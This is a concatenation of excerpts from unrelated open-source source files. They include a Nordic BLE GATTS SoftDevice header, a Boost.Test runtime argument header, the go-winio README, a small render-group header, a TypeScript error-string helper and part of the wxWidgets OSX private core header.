*/\r\nSVCALL(SD_BLE_GATTS_RW_AUTHORIZE_REPLY, uint32_t, sd_ble_gatts_rw_authorize_reply(uint16_t conn_handle, ble_gatts_rw_authorize_reply_params_t const *p_rw_authorize_reply_params));\r\n\r\n\r\n/**@brief Update persistent system attribute information.\r\n *\r\n * @details Supply information about persistent system attributes to the stack,\r\n * previously obtained using @ref sd_ble_gatts_sys_attr_get.\r\n * This call is only allowed for active connections, and is usually\r\n * made immediately after a connection is established with an known bonded device,\r\n * often as a response to a @ref BLE_GATTS_EVT_SYS_ATTR_MISSING.\r\n *\r\n * p_sysattrs may point directly to the application's stored copy of the system attributes\r\n * obtained using @ref sd_ble_gatts_sys_attr_get.\r\n * If the pointer is NULL, the system attribute info is initialized, assuming that\r\n * the application does not have any previously saved system attribute data for this device.\r\n *\r\n * @note The state of persistent system attributes is reset upon connection establishment and then remembered for its duration.\r\n *\r\n * @note If this call returns with an error code different from @ref NRF_SUCCESS, the storage of persistent system attributes may have been completed only partially.\r\n * This means that the state of the attribute table is undefined, and the application should either provide a new set of attributes using this same call or\r\n * reset the SoftDevice to return to a known state.\r\n *\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS is used with this function, only the system attributes included in system services will be modified.\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS is used with this function, only the system attributes included in user services will be modified.\r\n *\r\n * @param[in] conn_handle Connection handle.\r\n * @param[in] p_sys_attr_data Pointer to a saved copy of system attributes supplied to the stack, or NULL.\r\n * @param[in] len Size of data pointed by p_sys_attr_data, in octets.\r\n * @param[in] flags Optional additional flags, see @ref BLE_GATTS_SYS_ATTR_FLAGS\r\n *\r\n * @retval ::NRF_SUCCESS Successfully set the system attribute information.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_STATE Invalid Connection State.\r\n * @retval ::NRF_ERROR_INVALID_DATA Invalid data supplied, the data should be exactly the same as retrieved with @ref sd_ble_gatts_sys_attr_get.\r\n * @retval ::NRF_ERROR_NO_MEM Not enough memory to complete operation.\r\n * @retval ::NRF_ERROR_BUSY The stack is busy. Retry at later time.\r\n */\r\n#ifndef __RFduino__\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_SET, uint32_t, sd_ble_gatts_sys_attr_set(uint16_t conn_handle, uint8_t const *p_sys_attr_data, uint16_t len, uint32_t flags));\r\n#else\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_SET, uint32_t, sd_ble_gatts_sys_attr_set(uint16_t conn_handle, uint8_t const*const p_sys_attr_data, uint16_t len));\r\n#endif\r\n\r\n/**@brief Retrieve persistent system attribute information from the stack.\r\n *\r\n * @details This call is used to retrieve information about values to be stored perisistently by the application\r\n * during the lifetime of a connection or after it has been terminated. When a new connection is established with the same bonded device,\r\n * the system attribute information retrieved with this function should be restored using using @ref sd_ble_gatts_sys_attr_set.\r\n * If retrieved after disconnection, the data should be read before a new connection established. The connection handle for\r\n * the previous, now disconnected, connection will remain valid until a new one is created to allow this API call to refer to it.\r\n * Connection handles belonging to active connections can be used as well, but care should be taken since the system attributes\r\n * may be written to at any time by the peer during a connection's lifetime.\r\n *\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_SYS_SRVCS is used with this function, only the system attributes included in system services will be returned.\r\n * @note When the @ref BLE_GATTS_SYS_ATTR_FLAG_USR_SRVCS is used with this function, only the system attributes included in user services will be returned.\r\n *\r\n * @param[in] conn_handle Connection handle of the recently terminated connection.\r\n * @param[out] p_sys_attr_data Pointer to a buffer where updated information about system attributes will be filled in. NULL can be provided to\r\n * obtain the length of the data\r\n * @param[in,out] p_len Size of application buffer if p_sys_attr_data is not NULL. Unconditially updated to actual length of system attribute data.\r\n * @param[in] flags Optional additional flags, see @ref BLE_GATTS_SYS_ATTR_FLAGS\r\n *\r\n * @retval ::NRF_SUCCESS Successfully retrieved the system attribute information.\r\n * @retval ::BLE_ERROR_INVALID_CONN_HANDLE Invalid Connection Handle.\r\n * @retval ::NRF_ERROR_INVALID_ADDR Invalid pointer supplied.\r\n * @retval ::NRF_ERROR_DATA_SIZE The system attribute information did not fit into the provided buffer.\r\n * @retval ::NRF_ERROR_NOT_FOUND No system attributes found.\r\n */\r\nSVCALL(SD_BLE_GATTS_SYS_ATTR_GET, uint32_t, sd_ble_gatts_sys_attr_get(uint16_t conn_handle, uint8_t *p_sys_attr_data, uint16_t *p_len, uint32_t flags));\r\n\r\n/** @} */\r\n\r\n#endif // BLE_GATTS_H__\r\n\r\n/**\r\n @}\r\n*/\r\n"} {"text": "// (C) Copyright Gennadiy Rozental 2001.\r\n// Distributed under the Boost Software License, Version 1.0.\r\n// (See accompanying file LICENSE_1_0.txt or copy at\r\n// http://www.boost.org/LICENSE_1_0.txt)\r\n\r\n// See http://www.boost.org/libs/test for the library home page.\r\n//\r\n// File : $RCSfile$\r\n//\r\n// Version : $Revision$\r\n//\r\n// Description : model of actual argument (both typed and abstract interface)\r\n// ***************************************************************************\r\n\r\n#ifndef BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n#define BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n\r\n// Boost.Test Runtime parameters\r\n#include \r\n#include \r\n\r\n// Boost.Test\r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n// STL\r\n#include \r\n\r\n#include \r\n\r\nnamespace boost {\r\nnamespace runtime {\r\n\r\n// ************************************************************************** //\r\n// ************** runtime::argument ************** //\r\n// ************************************************************************** //\r\n\r\nclass argument {\r\npublic:\r\n // Constructor\r\n argument( rtti::id_t value_type )\r\n : p_value_type( value_type )\r\n {}\r\n\r\n // Destructor\r\n virtual ~argument() {}\r\n\r\n // Public properties\r\n rtti::id_t const p_value_type;\r\n};\r\n\r\n// ************************************************************************** //\r\n// ************** runtime::typed_argument ************** //\r\n// ************************************************************************** //\r\n\r\ntemplate\r\nclass typed_argument : public argument {\r\npublic:\r\n // Constructor\r\n explicit typed_argument( T const& v )\r\n : argument( rtti::type_id() )\r\n , p_value( v )\r\n {}\r\n\r\n unit_test::readwrite_property p_value;\r\n};\r\n\r\n// ************************************************************************** //\r\n// ************** runtime::arguments_store ************** //\r\n// ************************************************************************** //\r\n\r\nclass arguments_store {\r\npublic:\r\n typedef std::map storage_type;\r\n\r\n /// Returns number of arguments in the store; mostly used for testing\r\n std::size_t size() const { return m_arguments.size(); }\r\n\r\n /// Clears the store for reuse\r\n void clear() { m_arguments.clear(); }\r\n\r\n /// Returns true if there is an argument corresponding to the specified parameter name\r\n bool has( cstring parameter_name ) const\r\n {\r\n return m_arguments.find( parameter_name ) != m_arguments.end();\r\n }\r\n\r\n /// Provides types access to argument value by parameter name\r\n template\r\n T const& get( cstring parameter_name ) const {\r\n return const_cast(this)->get( parameter_name );\r\n }\r\n\r\n template\r\n T& get( cstring parameter_name ) {\r\n storage_type::const_iterator found = m_arguments.find( parameter_name );\r\n BOOST_TEST_I_ASSRT( found != m_arguments.end(),\r\n access_to_missing_argument() \r\n << \"There is no argument provided for parameter \"\r\n << parameter_name );\r\n\r\n argument_ptr arg = found->second;\r\n\r\n BOOST_TEST_I_ASSRT( arg->p_value_type == rtti::type_id(),\r\n arg_type_mismatch()\r\n << \"Access with invalid type for argument corresponding to parameter \"\r\n << parameter_name );\r\n\r\n return static_cast&>( *arg ).p_value.value;\r\n }\r\n\r\n /// Set's the argument value for specified parameter name\r\n template\r\n void set( cstring parameter_name, T const& value )\r\n {\r\n m_arguments[parameter_name] = argument_ptr( new typed_argument( value ) );\r\n }\r\n\r\nprivate:\r\n // Data members\r\n storage_type m_arguments;\r\n};\r\n\r\n} // namespace runtime\r\n} // namespace boost\r\n\r\n#include \r\n\r\n#endif // BOOST_TEST_UTILS_RUNTIME_ARGUMENT_HPP\r\n"} {"text": "# go-winio\n\nThis repository contains utilities for efficiently performing Win32 IO operations in\nGo. Currently, this is focused on accessing named pipes and other file handles, and\nfor using named pipes as a net transport.\n\nThis code relies on IO completion ports to avoid blocking IO on system threads, allowing Go\nto reuse the thread to schedule another goroutine. This limits support to Windows Vista and\nnewer operating systems. This is similar to the implementation of network sockets in Go's net\npackage.\n\nPlease see the LICENSE file for licensing information.\n\nThis project has adopted the [Microsoft Open Source Code of\nConduct](https://opensource.microsoft.com/codeofconduct/). For more information\nsee the [Code of Conduct\nFAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact\n[opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional\nquestions or comments.\n\nThanks to natefinch for the inspiration for this library. See https://github.com/natefinch/npipe\nfor another named pipe implementation.\n"} {"text": "#ifndef __APPLYRENDERGROUPS_H__\n#define __APPLYRENDERGROUPS_H__\n\nbool ApplyRenderGroups(CEditRegion* pRegion);\n\n#endif\n"} {"text": "export async function initErrorString(tag: string, id: string, foundVia?: string): Promise {\n\tif (tag == null) tag = 'element-tag'\n\tlet estr = `<${tag.toLowerCase()}`\n\tif (id != null) {\n\t\testr += ` id='#${id}'`\n\t}\n\n\tif (foundVia !== null) {\n\t\testr += ` found using '${foundVia}'`\n\t}\n\n\testr += '>'\n\treturn estr\n}\n"} {"text": "/////////////////////////////////////////////////////////////////////////////\n// Name: wx/osx/core/private.h\n// Purpose: Private declarations: as this header is only included by\n// wxWidgets itself, it may contain identifiers which don't start\n// with \"wx\".\n// Author: Stefan Csomor\n// Modified by:\n// Created: 1998-01-01\n// Copyright: (c) Stefan Csomor\n// Licence: wxWindows licence\n/////////////////////////////////////////////////////////////////////////////\n\n#ifndef _WX_PRIVATE_CORE_H_\n#define _WX_PRIVATE_CORE_H_\n\n#include \"wx/defs.h\"\n\n#include \n\n#include \"wx/osx/core/cfstring.h\"\n#include \"wx/osx/core/cfdataref.h\"\n\n// platform specific Clang analyzer support\n#ifndef NS_RETURNS_RETAINED\n# if WX_HAS_CLANG_FEATURE(attribute_ns_returns_retained)\n# define NS_RETURNS_RETAINED __attribute__((ns_returns_retained))\n# else\n# define NS_RETURNS_RETAINED\n# endif\n#endif\n\n#ifndef CF_RETURNS_RETAINED\n# if WX_HAS_CLANG_FEATURE(attribute_cf_returns_retained)\n# define CF_RETURNS_RETAINED __attribute__((cf_returns_retained))\n# else\n# define CF_RETURNS_RETAINED\n# endif\n#endif\n\n#if ( !wxUSE_GUI && !wxOSX_USE_IPHONE ) || wxOSX_USE_COCOA_OR_CARBON\n\n// Carbon functions are currently still used in wxOSX/Cocoa too (including\n// wxBase part of it).\n#include \n\nvoid WXDLLIMPEXP_CORE wxMacStringToPascal( const wxString&from , unsigned char * to );\nwxString WXDLLIMPEXP_CORE wxMacMakeStringFromPascal( const unsigned char * from );\n\nWXDLLIMPEXP_BASE wxString wxMacFSRefToPath( const FSRef *fsRef , CFStringRef additionalPathComponent = NULL );\nWXDLLIMPEXP_BASE OSStatus wxMacPathToFSRef( const wxString&path , FSRef *fsRef );\nWXDLLIMPEXP_BASE wxString wxMacHFSUniStrToString( ConstHFSUniStr255Param uniname );\n\n// keycode utils from app.cpp\n\nWXDLLIMPEXP_BASE CGKeyCode wxCharCodeWXToOSX(wxKeyCode code);\nWXDLLIMPEXP_BASE long wxMacTranslateKey(unsigned char key, unsigned char code);\n\n#endif\n\n#if wxUSE_GUI\n\n#if wxOSX_USE_IPHONE\n#include \n#else\n#include \n#endif\n\n#include \"wx/bitmap.h\"\n#include \"wx/window.h\"\n\nclass WXDLLIMPEXP_CORE wxMacCGContextStateSaver\n{\n wxDECLARE_NO_COPY_CLASS(wxMacCGContextStateSaver);\n\npublic:\n wxMacCGContextStateSaver( CGContextRef cg )\n {\n m_cg = cg;\n CGContextSaveGState( cg );\n }\n ~wxMacCGContextStateSaver()\n {\n CGContextRestoreGState( m_cg );\n }\nprivate:\n CGContextRef m_cg;\n};\n\nclass WXDLLIMPEXP_CORE wxDeferredObjectDeleter : public wxObject\n{\npublic :\n wxDeferredObjectDeleter( wxObject* obj ) : m_obj(obj)\n {\n }\n virtual ~wxDeferredObjectDeleter()\n {\n delete m_obj;\n }\nprotected :\n wxObject* m_obj ;\n} ;\n\n// Quartz\n\nWXDLLIMPEXP_CORE CGImageRef wxMacCreateCGImageFromBitmap( const wxBitmap& bitmap );\n\nWXDLLIMPEXP_CORE CGDataProviderRef wxMacCGDataProviderCreateWithCFData( CFDataRef data );\nWXDLLIMPEXP_CORE CGDataConsumerRef wxMacCGDataConsumerCreateWithCFData( CFMutableDataRef data );\nWXDLLIMPEXP_CORE CGDataProviderRef wxMacCGDataProviderCreateWithMemoryBuffer( const wxMemoryBuffer& buf );\n\nWXDLLIMPEXP_CORE CGColorSpaceRef wxMacGetGenericRGBColorSpace(void);\n\nWXDLLIMPEXP_CORE double wxOSXGetMainScreenContentScaleFactor();\n\nclass wxWindowMac;\n// to\nextern wxWindow* g_MacLastWindow;\nclass wxNonOwnedWindow;\n\n// temporary typedef so that no additional casts are necessary within carbon code at the moment\n\nclass wxMacControl;\nclass wxWidgetImpl;\nclass wxComboBox;\nclass wxNotebook;\nclass wxTextCtrl;\nclass wxSearchCtrl;\n\nWXDLLIMPEXP_CORE wxWindowMac * wxFindWindowFromWXWidget(WXWidget inControl );\n\ntypedef wxWidgetImpl wxWidgetImplType;\n\n#if wxUSE_MENUS\nclass wxMenuItemImpl : public wxObject\n{\npublic :\n wxMenuItemImpl( wxMenuItem* peer ) : m_peer(peer)\n {\n }\n\n virtual ~wxMenuItemImpl() ;\n virtual void SetBitmap( const wxBitmap& bitmap ) = 0;\n virtual void Enable( bool enable ) = 0;\n virtual void Check( bool check ) = 0;\n virtual void SetLabel( const wxString& text, wxAcceleratorEntry *entry ) = 0;\n virtual void Hide( bool hide = true ) = 0;\n\n virtual void * GetHMenuItem() = 0;\n\n wxMenuItem* GetWXPeer() { return m_peer ; }\n\n static wxMenuItemImpl* Create( wxMenuItem* peer, wxMenu *pParentMenu,\n int id,\n const wxString& text,\n wxAcceleratorEntry *entry,\n const wxString& strHelp,\n wxItemKind kind,\n wxMenu *pSubMenu );\n \n // handle OS specific menu items if they weren't handled during normal processing\n virtual bool DoDefault() { return false; }\nprotected :\n wxMenuItem* m_peer;\n\n wxDECLARE_ABSTRACT_CLASS(wxMenuItemImpl);\n} ;\n\nclass wxMenuImpl : public wxObject\n{\npublic :\n wxMenuImpl( wxMenu* peer ) : m_peer(peer)\n {\n }\n\n virtual ~wxMenuImpl() ;\n virtual void InsertOrAppend(wxMenuItem *pItem, size_t pos) = 0;\n virtual void Remove( wxMenuItem *pItem ) = 0;\n\n virtual void MakeRoot() = 0;\n\n virtual void SetTitle( const wxString& text ) = 0;\n\n virtual WXHMENU GetHMenu() = 0;\n\n wxMenu* GetWXPeer() { return m_peer ; }\n\n virtual void PopUp( wxWindow *win, int x, int y ) = 0;\n \n virtual void GetMenuBarDimensions(int &x, int &y, int &width, int &height) const\n {\n x = y = width = height = -1;\n }\n\n static wxMenuImpl* Create( wxMenu* peer, const wxString& title );\n static wxMenuImpl* CreateRootMenu( wxMenu* peer );\nprotected :\n wxMenu* m_peer;\n\n wxDECLARE_ABSTRACT_CLASS(wxMenuItemImpl);\n} ;\n#endif\n\n\nclass WXDLLIMPEXP_CORE wxWidgetImpl : public wxObject\n{\npublic :\n wxWidgetImpl( wxWindowMac* peer , bool isRootControl = false, bool isUserPane = false );\n wxWidgetImpl();\n virtual ~wxWidgetImpl();\n\n void Init();\n\n bool IsRootControl() const { return m_isRootControl; }\n \n bool IsUserPane() const { return m_isUserPane; }\n\n wxWindowMac* GetWXPeer() const { return m_wxPeer; }\n\n bool IsOk() const { return GetWXWidget() != NULL; }\n\n // not only the control itself, but also all its parents must be visible\n // in order for this function to return true\n virtual bool IsVisible() const = 0;\n // set the visibility of this widget (maybe latent)\n virtual void SetVisibility( bool visible ) = 0;\n\n virtual bool ShowWithEffect(bool WXUNUSED(show),\n wxShowEffect WXUNUSED(effect),\n unsigned WXUNUSED(timeout))\n {\n return false;\n }\n\n virtual void Raise() = 0;\n\n virtual void Lower() = 0;\n\n virtual void ScrollRect( const wxRect *rect, int dx, int dy ) = 0;\n\n virtual WXWidget GetWXWidget() const = 0;\n\n virtual void SetBackgroundColour( const wxColour& col ) = 0;\n virtual bool SetBackgroundStyle(wxBackgroundStyle style) = 0;\n\n // all coordinates in native parent widget relative coordinates\n virtual void GetContentArea( int &left , int &top , int &width , int &height ) const = 0;\n virtual void Move(int x, int y, int width, int height) = 0;\n virtual void GetPosition( int &x, int &y ) const = 0;\n virtual void GetSize( int &width, int &height ) const = 0;\n virtual void SetControlSize( wxWindowVariant variant ) = 0;\n virtual double GetContentScaleFactor() const\n {\n return 1.0;\n }\n \n // the native coordinates may have an 'aura' for shadows etc, if this is the case the layout\n // inset indicates on which insets the real control is drawn\n virtual void GetLayoutInset(int &left , int &top , int &right, int &bottom) const\n {\n left = top = right = bottom = 0;\n }\n\n // native view coordinates are topleft to bottom right (flipped regarding CoreGraphics origin)\n virtual bool IsFlipped() const { return true; }\n\n virtual void SetNeedsDisplay( const wxRect* where = NULL ) = 0;\n virtual bool GetNeedsDisplay() const = 0;\n\n virtual bool NeedsFocusRect() const;\n virtual void SetNeedsFocusRect( bool needs );\n\n virtual bool NeedsFrame() const;\n virtual void SetNeedsFrame( bool needs );\n \n virtual void SetDrawingEnabled(bool enabled);\n\n virtual bool CanFocus() const = 0;\n // return true if successful\n virtual bool SetFocus() = 0;\n virtual bool HasFocus() const = 0;\n\n virtual void RemoveFromParent() = 0;\n virtual void Embed( wxWidgetImpl *parent ) = 0;\n\n virtual void SetDefaultButton( bool isDefault ) = 0;\n virtual void PerformClick() = 0;\n virtual void SetLabel( const wxString& title, wxFontEncoding encoding ) = 0;\n#if wxUSE_MARKUP && wxOSX_USE_COCOA\n virtual void SetLabelMarkup( const wxString& WXUNUSED(markup) ) { }\n#endif\n\n virtual void SetCursor( const wxCursor & cursor ) = 0;\n virtual void CaptureMouse() = 0;\n virtual void ReleaseMouse() = 0;\n \n virtual void SetDropTarget( wxDropTarget * WXUNUSED(dropTarget) ) {}\n\n virtual wxInt32 GetValue() const = 0;\n virtual void SetValue( wxInt32 v ) = 0;\n virtual wxBitmap GetBitmap() const = 0;\n virtual void SetBitmap( const wxBitmap& bitmap ) = 0;\n virtual void SetBitmapPosition( wxDirection dir ) = 0;\n virtual void SetupTabs( const wxNotebook& WXUNUSED(notebook) ) {}\n virtual int TabHitTest( const wxPoint & WXUNUSED(pt), long *flags ) {*flags=1; return -1;}\n virtual void GetBestRect( wxRect *r ) const = 0;\n virtual bool IsEnabled() const = 0;\n virtual void Enable( bool enable ) = 0;\n virtual void SetMinimum( wxInt32 v ) = 0;\n virtual void SetMaximum( wxInt32 v ) = 0;\n virtual wxInt32 GetMinimum() const = 0;\n virtual wxInt32 GetMaximum() const = 0;\n virtual void PulseGauge() = 0;\n virtual void SetScrollThumb( wxInt32 value, wxInt32 thumbSize ) = 0;\n\n virtual void SetFont( const wxFont & font , const wxColour& foreground , long windowStyle, bool ignoreBlack = true ) = 0;\n\n virtual void SetToolTip(wxToolTip* WXUNUSED(tooltip)) { }\n\n // is the clicked event sent AFTER the state already changed, so no additional\n // state changing logic is required from the outside\n virtual bool ButtonClickDidStateChange() = 0;\n\n virtual void InstallEventHandler( WXWidget control = NULL ) = 0;\n\n // Mechanism used to keep track of whether a change should send an event\n // Do SendEvents(false) when starting actions that would trigger programmatic events\n // and SendEvents(true) at the end of the block.\n virtual void SendEvents(bool shouldSendEvents) { m_shouldSendEvents = shouldSendEvents; }\n virtual bool ShouldSendEvents() { return m_shouldSendEvents; }\n\n // static methods for associating native controls and their implementations\n\n // finds the impl associated with this native control\n static wxWidgetImpl*\n FindFromWXWidget(WXWidget control);\n\n // finds the impl associated with this native control, if the native control itself is not known\n // also checks whether its parent is eg a registered scrollview, ie whether the control is a native subpart\n // of a known control\n static wxWidgetImpl*\n FindBestFromWXWidget(WXWidget control);\n \n static void RemoveAssociations( wxWidgetImpl* impl);\n\n static void Associate( WXWidget control, wxWidgetImpl *impl );\n\n static WXWidget FindFocus();\n\n // static creation methods, must be implemented by all toolkits\n\n static wxWidgetImplType* CreateUserPane( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n static wxWidgetImplType* CreateContentView( wxNonOwnedWindow* now ) ;\n\n static wxWidgetImplType* CreateButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateDisclosureTriangle( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateStaticLine( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateGroupBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateStaticText( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateTextControl( wxTextCtrl* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& content,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateSearchControl( wxSearchCtrl* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& content,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle) ;\n\n static wxWidgetImplType* CreateCheckBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateRadioButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateToggleButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxString& label,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateBitmapToggleButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxBitmap& bitmap,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateBitmapButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxBitmap& bitmap,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateTabView( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateGauge( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateSlider( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateSpinButton( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxInt32 value,\n wxInt32 minimum,\n wxInt32 maximum,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateScrollBar( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateChoice( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxMenu* menu,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n static wxWidgetImplType* CreateListBox( wxWindowMac* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n\n#if wxOSX_USE_COCOA\n static wxWidgetImplType* CreateComboBox( wxComboBox* wxpeer,\n wxWindowMac* parent,\n wxWindowID id,\n wxMenu* menu,\n const wxPoint& pos,\n const wxSize& size,\n long style,\n long extraStyle);\n#endif\n\n // converts from Toplevel-Content relative to local\n static void Convert( wxPoint *pt , wxWidgetImpl *from , wxWidgetImpl *to );\nprotected :\n bool m_isRootControl;\n bool m_isUserPane;\n wxWindowMac* m_wxPeer;\n bool m_needsFocusRect;\n bool m_needsFrame;\n bool m_shouldSendEvents;\n\n wxDECLARE_ABSTRACT_CLASS(wxWidgetImpl);\n};\n\n//\n// the interface to be implemented eg by a listbox\n//\n\nclass WXDLLIMPEXP_CORE wxListWidgetColumn\n{\npublic :\n virtual ~wxListWidgetColumn() {}\n} ;\n\nclass WXDLLIMPEXP_CORE wxListWidgetCellValue\n{\npublic :\n wxListWidgetCellValue() {}\n virtual ~wxListWidgetCellValue() {}\n\n virtual void Set( CFStringRef value ) = 0;\n virtual void Set( const wxString& value ) = 0;\n virtual void Set( int value ) = 0;\n virtual void Check( bool check );\n\n virtual bool IsChecked() const;\n virtual int GetIntValue() const = 0;\n virtual wxString GetStringValue() const = 0;\n} ;\n\nclass WXDLLIMPEXP_CORE wxListWidgetImpl\n{\npublic:\n wxListWidgetImpl() {}\n virtual ~wxListWidgetImpl() { }\n\n virtual wxListWidgetColumn* InsertTextColumn( unsigned pos, const wxString& title, bool editable = false,\n wxAlignment just = wxALIGN_LEFT , int defaultWidth = -1) = 0 ;\n virtual wxListWidgetColumn* InsertCheckColumn( unsigned pos , const wxString& title, bool editable = false,\n wxAlignment just = wxALIGN_LEFT , int defaultWidth = -1) = 0 ;\n\n // add and remove\n\n // TODO will be replaced\n virtual void ListDelete( unsigned int n ) = 0;\n virtual void ListInsert( unsigned int n ) = 0;\n virtual void ListClear() = 0;\n\n // selecting\n\n virtual void ListDeselectAll() = 0;\n virtual void ListSetSelection( unsigned int n, bool select, bool multi ) = 0;\n virtual int ListGetSelection() const = 0;\n virtual int ListGetSelections( wxArrayInt& aSelections ) const = 0;\n virtual bool ListIsSelected( unsigned int n ) const = 0;\n\n // display\n\n virtual void ListScrollTo( unsigned int n ) = 0;\n virtual int ListGetTopItem() const = 0;\n virtual void UpdateLine( unsigned int n, wxListWidgetColumn* col = NULL ) = 0;\n virtual void UpdateLineToEnd( unsigned int n) = 0;\n\n // accessing content\n\n virtual unsigned int ListGetCount() const = 0;\n\n virtual int DoListHitTest( const wxPoint& inpoint ) const = 0;\n};\n\n//\n// interface to be implemented by a textcontrol\n//\n\nclass WXDLLIMPEXP_FWD_CORE wxTextAttr;\nclass WXDLLIMPEXP_FWD_CORE wxTextEntry;\n\n// common interface for all implementations\nclass WXDLLIMPEXP_CORE wxTextWidgetImpl\n\n{\npublic :\n // Any widgets implementing this interface must be associated with a\n // wxTextEntry so instead of requiring the derived classes to implement\n // another (pure) virtual function, just take the pointer to this entry in\n // our ctor and implement GetTextEntry() ourselves.\n wxTextWidgetImpl(wxTextEntry *entry) : m_entry(entry) {}\n\n virtual ~wxTextWidgetImpl() {}\n\n wxTextEntry *GetTextEntry() const { return m_entry; }\n\n virtual bool CanFocus() const { return true; }\n\n virtual wxString GetStringValue() const = 0 ;\n virtual void SetStringValue( const wxString &val ) = 0 ;\n virtual void SetSelection( long from, long to ) = 0 ;\n virtual void GetSelection( long* from, long* to ) const = 0 ;\n virtual void WriteText( const wxString& str ) = 0 ;\n\n virtual bool CanClipMaxLength() const { return false; }\n virtual void SetMaxLength(unsigned long WXUNUSED(len)) {}\n\n virtual bool CanForceUpper() { return false; }\n virtual void ForceUpper() {}\n\n virtual bool GetStyle( long position, wxTextAttr& style);\n virtual void SetStyle( long start, long end, const wxTextAttr& style ) ;\n virtual void Copy() ;\n virtual void Cut() ;\n virtual void Paste() ;\n virtual bool CanPaste() const ;\n virtual void SetEditable( bool editable ) ;\n virtual long GetLastPosition() const ;\n virtual void Replace( long from, long to, const wxString &str ) ;\n virtual void Remove( long from, long to ) ;\n\n\n virtual bool HasOwnContextMenu() const\n { return false ; }\n\n virtual bool SetupCursor( const wxPoint& WXUNUSED(pt) )\n { return false ; }\n\n virtual void Clear() ;\n virtual bool CanUndo() const;\n virtual void Undo() ;\n virtual bool CanRedo() const;\n virtual void Redo() ;\n virtual int GetNumberOfLines() const ;\n virtual long XYToPosition(long x, long y) const;\n virtual bool PositionToXY(long pos, long *x, long *y) const ;\n virtual void ShowPosition(long WXUNUSED(pos)) ;\n virtual int GetLineLength(long lineNo) const ;\n virtual wxString GetLineText(long lineNo) const ;\n virtual void CheckSpelling(bool WXUNUSED(check)) { }\n\n virtual wxSize GetBestSize() const { return wxDefaultSize; }\n\n virtual bool SetHint(const wxString& WXUNUSED(hint)) { return false; }\nprivate:\n wxTextEntry * const m_entry;\n\n wxDECLARE_NO_COPY_CLASS(wxTextWidgetImpl);\n};\n\n// common interface for all implementations\nclass WXDLLIMPEXP_CORE wxComboWidgetImpl\n\n{\npublic :\n wxComboWidgetImpl() {}\n\n virtual ~wxComboWidgetImpl() {}\n\n virtual int GetSelectedItem() const { return -1; }\n virtual void 